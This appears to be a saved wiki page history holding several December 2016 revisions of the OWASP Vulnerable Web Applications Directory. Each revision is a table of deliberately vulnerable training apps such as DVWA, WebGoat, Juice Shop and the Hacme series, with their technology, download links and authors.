| [https://www.gracefulsecurity.com/vulnvm/ Seattle Sounds - Graceful’s VulnVM]
|
| [https://www.gracefulsecurity.com/Seattle-0.0.5.7z download]
|
|
|-
| [http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html Sauron ]
| Quemu
| [http://sg6-labs.blogspot.com/search/label/SecGame solutions]
|
|
|-
| [http://sourceforge.net/projects/virtualhacking/ Virtual Hacking Lab ]
| ZIP
| [http://sourceforge.net/projects/virtualhacking/files/ download]
|
|
|-
| [http://www.mavensecurity.com/web_security_dojo/ Web Security Dojo ]
| VMware, VirtualBox
| [http://sourceforge.net/projects/websecuritydojo/files/ download]
|
|
|-
| [http://www.ethicalhack3r.co.uk/wordpress-cd/ WordPress CD]
| VirtualBox
| [http://www.ethicalhack3r.co.uk/wpcd/WPCD.ova download]
| ethicalhack3r
| [http://www.randomstorm.com/wpscan-security-tool.php WPScan]
|-
| [http://xxe.sourceforge.net/ XXE ]
| VMware
| [http://sourceforge.net/projects/xxe/files/ download]
|
|
|-
|}

OWASP Vulnerable Web Applications Directory Project/Pages/Offline

2016-12-11T06:54:36Z

Jason Haddix:

{| border="1" width="80%" cellspacing="0" cellpadding="2"
|-
! scope="col" | App Name / Link
! scope="col" | Technology
! scope="col" | Other links
! scope="col" | Author
! scope="col" | Notes
|-
| [https://github.com/CSPF-Founder/btslab/ btslab]
| PHP
|
|
| Includes flash-based xss, SSRF, and SSI
|-
| [http://www.badstore.net/ BadStore]
| Perl(CGI)
|
|
|
|-
| [http://code.google.com/p/bodgeit/ BodgeIt Store ]
| Java
| [http://code.google.com/p/bodgeit/downloads/list download]
|
|
|-
| [http://sechow.com/bricks/index.html Bricks ]
| PHP
| [http://sechow.com/bricks/download.html download] [http://sechow.com/bricks/docs/ docs]
| OWASP
|
|-
| [http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project/ Butterfly Security Project]
| PHP
| [http://sourceforge.net/projects/thebutterflytmp/files/ download]
|
| Last updated in 2008
|-
| [http://www.itsecgames.com/ bWAPP ]
| PHP
| [http://sourceforge.net/projects/bwapp/files/ download] [http://itsecgames.blogspot.be/2013/01/bwapp-installation.html docs]
|
|
|-
| [https://github.com/fridaygoldsmith/bwa_cyclone_transfers Cyclone Transfers ]
| Ruby on Rails
|
|
|
|-
| [https://github.com/quantumfoam/DVNA/ Damn Vulnerable Node Application - DVNA ]
| Node.js
| [https://github.com/quantumfoam/DVNA/ download]
| Claudio Lacayo
|
|-
| [http://www.dvwa.co.uk/ Damn Vulnerable Web Application - DVWA ]
| PHP
| [http://code.google.com/p/dvwa/downloads/list download]
| RandomStorm
|
|-
| [http://dvws.secureideas.net/ Damn Vulnerable Web Service - DVWS ]
| PHP
| [http://dvws.secureideas.net/downloads/files/dvws.tgz download]
| Secure Ideas (depriciated?)
|
|-
| [https://github.com/snoopysecurity/dvws Damn Vulnerable Web Services - DVWS ]
| PHP
|
| snoopysecurity
|
|-
| [https://github.com/secvulture/dvta Damn Vulnerable Thick Client App - DVTA ]
| C# .NET
|
| secvulture
|
|-
| [http://google-gruyere.appspot.com/ Gruyere ]
| Python
| [http://google-gruyere.appspot.com/gruyere-code.zip download]
| Google
|
|-
| [https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project Hackademic Challenges Project ]
| PHP
| [https://code.google.com/p/owasp-hackademic-challenges/ download]
| OWASP
|
|-
| [https://github.com/rapid7/hackazon Hackazon]
|
|
| Rapid7
| Has some REST and new-school web components.
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx Hacme Bank - Android]
|
|
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx Hacme Bank ]
| .NET
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-bank.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx Hacme Books ]
| Java
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmebooks.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx Hacme Casino ]
| Ruby on Rails
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-casino.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx Hacme Shipping ]
| ColdFusion
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmeshipping.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx Hacme Travel ]
| C++
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmetravel.aspx download]
| McAfee / Foundstone
|
|-
| [http://hackxor.sourceforge.net/cgi-bin/index.pl hackxor]
|
|
|
| First 2 levels online, rest offline
|-
| [https://www.owasp.org/index.php/OWASP_Juice_Shop_Project Juice Shop]
| Node/JS
| [https://github.com/bkimminich/juice-shop download]
| OWASP
|
|-
| [http://sourceforge.net/projects/lampsecurity/ LampSecurity]
| PHP
|
|
|
|-
| [http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10 Mutillidae ]
| PHP
| [http://www.irongeek.com/mutillidae/ download]
|
|
|-
| [https://github.com/jerryhoff/WebGoat.NET .NET Goat ]
| C#
| [https://github.com/jerryhoff/WebGoat.NET git repository]
| OWASP
|
|-
| [https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project NodeGoat ]
| Node.js
| [https://github.com/OWASP/NodeGoat git repository]
| OWASP
|
|-
| [http://peruggia.sourceforge.net/ Peruggia ]
| PHP
| [http://sourceforge.net/projects/peruggia/files/ download]
|
|
|-
| [https://code.google.com/p/puzzlemall/ Puzzlemall ]
| Java
| [https://code.google.com/p/puzzlemall/downloads/list download] [https://code.google.com/p/puzzlemall/downloads/list docs]
|
|
|-
| [https://www.owasp.org/index.php/OWASP_Rails_Goat_Project Rails Goat ]
| Ruby on Rails
| [https://github.com/OWASP/railsgoat/archive/master.zip download] [http://railsgoat.cktricky.com/getting_started.html docs]
| OWASP
|
|-
| [http://suif.stanford.edu/%7Elivshits/securibench/ SecuriBench]
| Java
|
| Stanford
|
|-
| [http://suif.stanford.edu/%7Elivshits/work/securibench-micro/ SecuriBench Micro]
| Java
| [http://suif.stanford.edu/~livshits/securibench/download.html download]
| Stanford
|
|-
| [https://www.owasp.org/index.php/OWASP_Security_Shepherd Security Shepherd]
| Java
| [https://sourceforge.net/projects/owaspshepherd/ download]
| OWASP
|
|-
| [https://github.com/sqlmapproject/testenv SQL injection test environment]
| PHP
|
|
| SQLmap Project
|-
| [https://github.com/Audi-1/sqli-labs SQLI-labs]
| PHP
| [https://github.com/Audi-1/sqli-labs/archive/master.zip download] [http://dummy2dummies.blogspot.com/ blog]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/sakti/twitterlike twitterlike ]
| PHP
| [https://github.com/sakti/twitterlike git repository]
| Sakti Dwi Cahyono
|
|-
| [http://www.nth-dimension.org.uk/blog.php?id=88 VulnApp ]
| .NET
| [http://projects.nth-dimension.org.uk/dir?d=VulnApp CVS download] [http://projects.nth-dimension.org.uk/rptview?rn=6 vulns]
|
|
|-
| [http://exploit.co.il/hacking/exploit-kb-vulnerable-web-app/ Vulnerable Web App]
|
|
| Exploit.co.il
|
|-
| [https://github.com/adamdoupe/WackoPicko WackoPicko ]
| PHP
| [https://github.com/adamdoupe/WackoPicko/zipball/master download] [http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf whitepaper]
|
|
|-
| [https://github.com/sectooladdict/wavsep WAVSEP - Web Application Vulnerability Scanner Evaluation Project ]
| Java
| [https://sourceforge.net/projects/wavsep/ download (builds)] [https://code.google.com/p/wavsep/downloads/list download (old)] [https://github.com/sectooladdict/wavsep/wiki wiki]
| Shay Chen
|
|-
| [https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project WebGoat ]
| Java
| [http://code.google.com/p/webgoat/downloads/list download] [https://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents guide]
| OWASP
|
|-
| [https://www.owasp.org/index.php/WebGoatPHP WebGoatPHP ]
| PHP
| [https://github.com/OWASP/OWASPWebGoatPHP download] [https://github.com/OWASP/OWASPWebGoatPHP/blob/master/README.md guide]
| OWASP
|
|-
| [https://code.google.com/p/wivet/ WIVET - Web Input Vector Extractor Teaser]
|
| [http://www.webguvenligi.org/projeler/wivet download] [https://code.google.com/p/wivet/downloads/list?can=1&q= tests]
|
|
|-
| [https://github.com/s4n7h0/xvwa Xtreme Vulnerable Web Application (XVWA)]
| PHP/MySQL
| [https://github.com/s4n7h0/xvwa download]
| @s4n7h0, @samanL33T
|
|-
|}

OWASP Vulnerable Web Applications Directory Project/Pages/Offline

2016-12-11T06:44:21Z

Jason Haddix:

{| border="1" width="80%" cellspacing="0" cellpadding="2"
|-
! scope="col" | App Name / Link
! scope="col" | Technology
! scope="col" | Other links
! scope="col" | Author
! scope="col" | Notes
|-
| [https://github.com/CSPF-Founder/btslab/ btslab]
| PHP
|
|
| Includes flash-based xss, SSRF, and SSI
|-
| [http://www.badstore.net/ BadStore]
| Perl(CGI)
|
|
|
|-
| [http://code.google.com/p/bodgeit/ BodgeIt Store ]
| Java
| [http://code.google.com/p/bodgeit/downloads/list download]
|
|
|-
| [http://sechow.com/bricks/index.html Bricks ]
| PHP
| [http://sechow.com/bricks/download.html download] [http://sechow.com/bricks/docs/ docs]
| OWASP
|
|-
| [http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project/ Butterfly Security Project]
| PHP
| [http://sourceforge.net/projects/thebutterflytmp/files/ download]
|
| Last updated in 2008
|-
| [http://www.itsecgames.com/ bWAPP ]
| PHP
| [http://sourceforge.net/projects/bwapp/files/ download] [http://itsecgames.blogspot.be/2013/01/bwapp-installation.html docs]
|
|
|-
| [https://github.com/fridaygoldsmith/bwa_cyclone_transfers Cyclone Transfers ]
| Ruby on Rails
|
|
|
|-
| [https://github.com/quantumfoam/DVNA/ Damn Vulnerable Node Application - DVNA ]
| Node.js
| [https://github.com/quantumfoam/DVNA/ download]
| Claudio Lacayo
|
|-
| [http://www.dvwa.co.uk/ Damn Vulnerable Web Application - DVWA ]
| PHP
| [http://code.google.com/p/dvwa/downloads/list download]
| RandomStorm
|
|-
| [http://dvws.secureideas.net/ Damn Vulnerable Web Service - DVWS ]
| PHP
| [http://dvws.secureideas.net/downloads/files/dvws.tgz download]
| Secure Ideas (depriciated?)
|
|-
| [https://github.com/snoopysecurity/dvws Damn Vulnerable Web Services - DVWS ]
| PHP
|
| snoopysecurity
|
|-
| [https://github.com/secvulture/dvta Damn Vulnerable Thick Client App - DVTA ]
| C# .NET
|
| secvulture
|
|-
| [http://google-gruyere.appspot.com/ Gruyere ]
| Python
| [http://google-gruyere.appspot.com/gruyere-code.zip download]
| Google
|
|-
| [https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project Hackademic Challenges Project ]
| PHP
| [https://code.google.com/p/owasp-hackademic-challenges/ download]
| OWASP
|
|-
| [https://github.com/rapid7/hackazon Hackazon]
|
|
| Rapid7
| Has some REST and new-school web components.
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx Hacme Bank - Android]
|
|
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx Hacme Bank ]
| .NET
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-bank.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx Hacme Books ]
| Java
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmebooks.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx Hacme Casino ]
| Ruby on Rails
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-casino.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx Hacme Shipping ]
| ColdFusion
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmeshipping.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx Hacme Travel ]
| C++
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmetravel.aspx download]
| McAfee / Foundstone
|
|-
| [http://hackxor.sourceforge.net/cgi-bin/index.pl hackxor]
|
|
|
| First 2 levels online, rest offline
|-
| [https://www.owasp.org/index.php/OWASP_Juice_Shop_Project Juice Shop]
| Node/JS
| [https://github.com/bkimminich/juice-shop download]
| OWASP
|
|-
| [http://sourceforge.net/projects/lampsecurity/ LampSecurity]
| PHP
|
|
|
|-
| [http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10 Mutillidae ]
| PHP
| [http://www.irongeek.com/mutillidae/ download]
|
|
|-
| [https://github.com/jerryhoff/WebGoat.NET .NET Goat ]
| C#
| [https://github.com/jerryhoff/WebGoat.NET git repository]
| OWASP
|
|-
| [https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project NodeGoat ]
| Node.js
| [https://github.com/OWASP/NodeGoat git repository]
| OWASP
|
|-
| [http://peruggia.sourceforge.net/ Peruggia ]
| PHP
| [http://sourceforge.net/projects/peruggia/files/ download]
|
|
|-
| [https://code.google.com/p/puzzlemall/ Puzzlemall ]
| Java
| [https://code.google.com/p/puzzlemall/downloads/list download] [https://code.google.com/p/puzzlemall/downloads/list docs]
|
|
|-
| [https://www.owasp.org/index.php/OWASP_Rails_Goat_Project Rails Goat ]
| Ruby on Rails
| [https://github.com/OWASP/railsgoat/archive/master.zip download] [http://railsgoat.cktricky.com/getting_started.html docs]
| OWASP
|
|-
| [https://www.gracefulsecurity.com/vulnvm/ Seattle Sounds - Graceful’s VulnVM]
|
| [https://www.gracefulsecurity.com/Seattle-0.0.5.7z]
|
|
|-
| [http://suif.stanford.edu/%7Elivshits/securibench/ SecuriBench]
| Java
|
| Stanford
|
|-
| [http://suif.stanford.edu/%7Elivshits/work/securibench-micro/ SecuriBench Micro]
| Java
| [http://suif.stanford.edu/~livshits/securibench/download.html download]
| Stanford
|
|-
| [https://www.owasp.org/index.php/OWASP_Security_Shepherd Security Shepherd]
| Java
| [https://sourceforge.net/projects/owaspshepherd/ download]
| OWASP
|
|-
| [https://github.com/sqlmapproject/testenv SQL injection test environment]
| PHP
|
|
| SQLmap Project
|-
| [https://github.com/Audi-1/sqli-labs SQLI-labs]
| PHP
| [https://github.com/Audi-1/sqli-labs/archive/master.zip download] [http://dummy2dummies.blogspot.com/ blog]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/sakti/twitterlike twitterlike ]
| PHP
| [https://github.com/sakti/twitterlike git repository]
| Sakti Dwi Cahyono
|
|-
| [http://www.nth-dimension.org.uk/blog.php?id=88 VulnApp ]
| .NET
| [http://projects.nth-dimension.org.uk/dir?d=VulnApp CVS download] [http://projects.nth-dimension.org.uk/rptview?rn=6 vulns]
|
|
|-
| [http://exploit.co.il/hacking/exploit-kb-vulnerable-web-app/ Vulnerable Web App]
|
|
| Exploit.co.il
|
|-
| [https://github.com/adamdoupe/WackoPicko WackoPicko ]
| PHP
| [https://github.com/adamdoupe/WackoPicko/zipball/master download] [http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf whitepaper]
|
|
|-
| [https://github.com/sectooladdict/wavsep WAVSEP - Web Application Vulnerability Scanner Evaluation Project ]
| Java
| [https://sourceforge.net/projects/wavsep/ download (builds)] [https://code.google.com/p/wavsep/downloads/list download (old)] [https://github.com/sectooladdict/wavsep/wiki wiki]
| Shay Chen
|
|-
| [https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project WebGoat ]
| Java
| [http://code.google.com/p/webgoat/downloads/list download] [https://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents guide]
| OWASP
|
|-
| [https://www.owasp.org/index.php/WebGoatPHP WebGoatPHP ]
| PHP
| [https://github.com/OWASP/OWASPWebGoatPHP download] [https://github.com/OWASP/OWASPWebGoatPHP/blob/master/README.md guide]
| OWASP
|
|-
| [https://code.google.com/p/wivet/ WIVET - Web Input Vector Extractor Teaser]
|
| [http://www.webguvenligi.org/projeler/wivet download] [https://code.google.com/p/wivet/downloads/list?can=1&q= tests]
|
|
|-
| [https://github.com/s4n7h0/xvwa Xtreme Vulnerable Web Application (XVWA)]
| PHP/MySQL
| [https://github.com/s4n7h0/xvwa download]
| @s4n7h0, @samanL33T
|
|-
|}

OWASP Vulnerable Web Applications Directory Project/Pages/Offline

2016-12-10T17:39:23Z

Jason Haddix:

{| border="1" width="80%" cellspacing="0" cellpadding="2"
|-
! scope="col" | App Name / Link
! scope="col" | Technology
! scope="col" | Other links
! scope="col" | Author
! scope="col" | Notes
|-
| [https://github.com/CSPF-Founder/btslab/ btslab]
| PHP
|
|
| Includes flash-based xss, SSRF, and SSI
|-
| [http://www.badstore.net/ BadStore]
| Perl(CGI)
|
|
|
|-
| [http://code.google.com/p/bodgeit/ BodgeIt Store ]
| Java
| [http://code.google.com/p/bodgeit/downloads/list download]
|
|
|-
| [http://sechow.com/bricks/index.html Bricks ]
| PHP
| [http://sechow.com/bricks/download.html download] [http://sechow.com/bricks/docs/ docs]
| OWASP
|
|-
| [http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project/ Butterfly Security Project]
| PHP
| [http://sourceforge.net/projects/thebutterflytmp/files/ download]
|
| Last updated in 2008
|-
| [http://www.itsecgames.com/ bWAPP ]
| PHP
| [http://sourceforge.net/projects/bwapp/files/ download] [http://itsecgames.blogspot.be/2013/01/bwapp-installation.html docs]
|
|
|-
| [https://github.com/fridaygoldsmith/bwa_cyclone_transfers Cyclone Transfers ]
| Ruby on Rails
|
|
|
|-
| [https://github.com/quantumfoam/DVNA/ Damn Vulnerable Node Application - DVNA ]
| Node.js
| [https://github.com/quantumfoam/DVNA/ download]
| Claudio Lacayo
|
|-
| [http://www.dvwa.co.uk/ Damn Vulnerable Web Application - DVWA ]
| PHP
| [http://code.google.com/p/dvwa/downloads/list download]
| RandomStorm
|
|-
| [http://dvws.secureideas.net/ Damn Vulnerable Web Services - DVWS ]
| PHP
| [http://dvws.secureideas.net/downloads/files/dvws.tgz download]
| Secure Ideas
|
|-
| [http://google-gruyere.appspot.com/ Gruyere ]
| Python
| [http://google-gruyere.appspot.com/gruyere-code.zip download]
| Google
|
|-
| [https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project Hackademic Challenges Project ]
| PHP
| [https://code.google.com/p/owasp-hackademic-challenges/ download]
| OWASP
|
|-
| [https://github.com/rapid7/hackazon Hackazon]
|
|
| Rapid7
| Has some REST and new-school web components.
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx Hacme Bank - Android]
|
|
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx Hacme Bank ]
| .NET
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-bank.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx Hacme Books ]
| Java
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmebooks.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx Hacme Casino ]
| Ruby on Rails
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-casino.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx Hacme Shipping ]
| ColdFusion
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmeshipping.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx Hacme Travel ]
| C++
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmetravel.aspx download]
| McAfee / Foundstone
|
|-
| [http://hackxor.sourceforge.net/cgi-bin/index.pl hackxor]
|
|
|
| First 2 levels online, rest offline
|-
| [https://www.owasp.org/index.php/OWASP_Juice_Shop_Project Juice Shop]
| Node/JS
| [https://github.com/bkimminich/juice-shop download]
| OWASP
|
|-
| [http://sourceforge.net/projects/lampsecurity/ LampSecurity]
| PHP
|
|
|
|-
| [http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10 Mutillidae ]
| PHP
| [http://www.irongeek.com/mutillidae/ download]
|
|
|-
| [https://github.com/jerryhoff/WebGoat.NET .NET Goat ]
| C#
| [https://github.com/jerryhoff/WebGoat.NET git repository]
| OWASP
|
|-
| [https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project NodeGoat ]
| Node.js
| [https://github.com/OWASP/NodeGoat git repository]
| OWASP
|
|-
| [http://peruggia.sourceforge.net/ Peruggia ]
| PHP
| [http://sourceforge.net/projects/peruggia/files/ download]
|
|
|-
| [https://code.google.com/p/puzzlemall/ Puzzlemall ]
| Java
| [https://code.google.com/p/puzzlemall/downloads/list download] [https://code.google.com/p/puzzlemall/downloads/list docs]
|
|
|-
| [https://www.owasp.org/index.php/OWASP_Rails_Goat_Project Rails Goat ]
| Ruby on Rails
| [https://github.com/OWASP/railsgoat/archive/master.zip download] [http://railsgoat.cktricky.com/getting_started.html docs]
| OWASP
|
|-
| [http://suif.stanford.edu/%7Elivshits/securibench/ SecuriBench]
| Java
|
| Stanford
|
|-
| [http://suif.stanford.edu/%7Elivshits/work/securibench-micro/ SecuriBench Micro]
| Java
| [http://suif.stanford.edu/~livshits/securibench/download.html download]
| Stanford
|
|-
| [https://www.owasp.org/index.php/OWASP_Security_Shepherd Security Shepherd]
| Java
| [https://sourceforge.net/projects/owaspshepherd/ download]
| OWASP
|
|-
| [https://github.com/sqlmapproject/testenv SQL injection test environment]
| PHP
|
|
| SQLmap Project
|-
| [https://github.com/Audi-1/sqli-labs SQLI-labs]
| PHP
| [https://github.com/Audi-1/sqli-labs/archive/master.zip download] [http://dummy2dummies.blogspot.com/ blog]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/SpiderLabs/SQLol SQLol ]
| PHP
| [https://github.com/SpiderLabs/SQLol/archive/master.zip download]
|
|
|-
| [https://github.com/sakti/twitterlike twitterlike ]
| PHP
| [https://github.com/sakti/twitterlike git repository]
| Sakti Dwi Cahyono
|
|-
| [http://www.nth-dimension.org.uk/blog.php?id=88 VulnApp ]
| .NET
| [http://projects.nth-dimension.org.uk/dir?d=VulnApp CVS download] [http://projects.nth-dimension.org.uk/rptview?rn=6 vulns]
|
|
|-
| [http://exploit.co.il/hacking/exploit-kb-vulnerable-web-app/ Vulnerable Web App]
|
|
| Exploit.co.il
|
|-
| [https://github.com/adamdoupe/WackoPicko WackoPicko ]
| PHP
| [https://github.com/adamdoupe/WackoPicko/zipball/master download] [http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf whitepaper]
|
|
|-
| [https://github.com/sectooladdict/wavsep WAVSEP - Web Application Vulnerability Scanner Evaluation Project ]
| Java
| [https://sourceforge.net/projects/wavsep/ download (builds)] [https://code.google.com/p/wavsep/downloads/list download (old)] [https://github.com/sectooladdict/wavsep/wiki wiki]
| Shay Chen
|
|-
| [https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project WebGoat ]
| Java
| [http://code.google.com/p/webgoat/downloads/list download] [https://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents guide]
| OWASP
|
|-
| [https://www.owasp.org/index.php/WebGoatPHP WebGoatPHP ]
| PHP
| [https://github.com/OWASP/OWASPWebGoatPHP download] [https://github.com/OWASP/OWASPWebGoatPHP/blob/master/README.md guide]
| OWASP
|
|-
| [https://code.google.com/p/wivet/ WIVET - Web Input Vector Extractor Teaser]
|
| [http://www.webguvenligi.org/projeler/wivet download] [https://code.google.com/p/wivet/downloads/list?can=1&q= tests]
|
|
|-
| [https://github.com/s4n7h0/xvwa Xtreme Vulnerable Web Application (XVWA)]
| PHP/MySQL
| [https://github.com/s4n7h0/xvwa download]
| @s4n7h0, @samanL33T
|
|-
|}

OWASP Vulnerable Web Applications Directory Project/Pages/Offline

2016-12-10T17:31:27Z

Jason Haddix:

{| border="1" width="80%" cellspacing="0" cellpadding="2"
|-
! scope="col" | App Name / Link
! scope="col" | Technology
! scope="col" | Other links
! scope="col" | Author
! scope="col" | Notes
|-
| [https://github.com/CSPF-Founder/btslab/ btslab]
| PHP
|
|
| Includes flash-based xss, SSRF, and SSI
|-
| [http://www.badstore.net/ BadStore]
| Perl(CGI)
|
|
|
|-
| [http://code.google.com/p/bodgeit/ BodgeIt Store ]
| Java
| [http://code.google.com/p/bodgeit/downloads/list download]
|
|
|-
| [http://sechow.com/bricks/index.html Bricks ]
| PHP
| [http://sechow.com/bricks/download.html download] [http://sechow.com/bricks/docs/ docs]
| OWASP
|
|-
| [http://sourceforge.net/projects/thebutterflytmp/files/ButterFly%20Project/ Butterfly Security Project]
| PHP
| [http://sourceforge.net/projects/thebutterflytmp/files/ download]
|
| Last updated in 2008
|-
| [http://www.itsecgames.com/ bWAPP ]
| PHP
| [http://sourceforge.net/projects/bwapp/files/ download] [http://itsecgames.blogspot.be/2013/01/bwapp-installation.html docs]
|
|
|-
| [https://github.com/fridaygoldsmith/bwa_cyclone_transfers Cyclone Transfers ]
| Ruby on Rails
|
|
|
|-
| [https://github.com/quantumfoam/DVNA/ Damn Vulnerable Node Application - DVNA ]
| Node.js
| [https://github.com/quantumfoam/DVNA/ download]
| Claudio Lacayo
|
|-
| [http://www.dvwa.co.uk/ Damn Vulnerable Web Application - DVWA ]
| PHP
| [http://code.google.com/p/dvwa/downloads/list download]
| RandomStorm
|
|-
| [http://dvws.secureideas.net/ Damn Vulnerable Web Services - DVWS ]
| PHP
| [http://dvws.secureideas.net/downloads/files/dvws.tgz download]
| Secure Ideas
|
|-
| [http://google-gruyere.appspot.com/ Gruyere ]
| Python
| [http://google-gruyere.appspot.com/gruyere-code.zip download]
| Google
|
|-
| [https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project Hackademic Challenges Project ]
| PHP
| [https://code.google.com/p/owasp-hackademic-challenges/ download]
| OWASP
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx Hacme Bank - Android]
|
|
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx Hacme Bank ]
| .NET
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-bank.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx Hacme Books ]
| Java
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmebooks.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx Hacme Casino ]
| Ruby on Rails
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacme-casino.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx Hacme Shipping ]
| ColdFusion
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmeshipping.aspx download]
| McAfee / Foundstone
|
|-
| [http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx Hacme Travel ]
| C++
| [http://www.mcafee.com/apps/free-tools/termsofuse.aspx?url=/us/downloads/free-tools/hacmetravel.aspx download]
| McAfee / Foundstone
|
|-
| [http://hackxor.sourceforge.net/cgi-bin/index.pl hackxor]
|
|
|
| First 2 levels online, rest offline
|-
| [https://www.owasp.org/index.php/OWASP_Juice_Shop_Project Juice Shop]
| Node/JS
| [https://github.com/bkimminich/juice-shop download]
| OWASP
|
|-
| [http://sourceforge.net/projects/lampsecurity/ LampSecurity]
| PHP
|
|
|
|-
| [http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10 Mutillidae ]
| PHP
| [http://www.irongeek.com/mutillidae/ download]
|
|
|-
| [https://github.com/jerryhoff/WebGoat.NET .NET Goat ]
| C#
| [https://github.com/jerryhoff/WebGoat.NET git repository]
| OWASP
|
|-
| [https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project NodeGoat ]
| Node.js
| [https://github.com/OWASP/NodeGoat git repository]
| OWASP
|
|-
| [http://peruggia.sourceforge.net/ Peruggia ]
| PHP
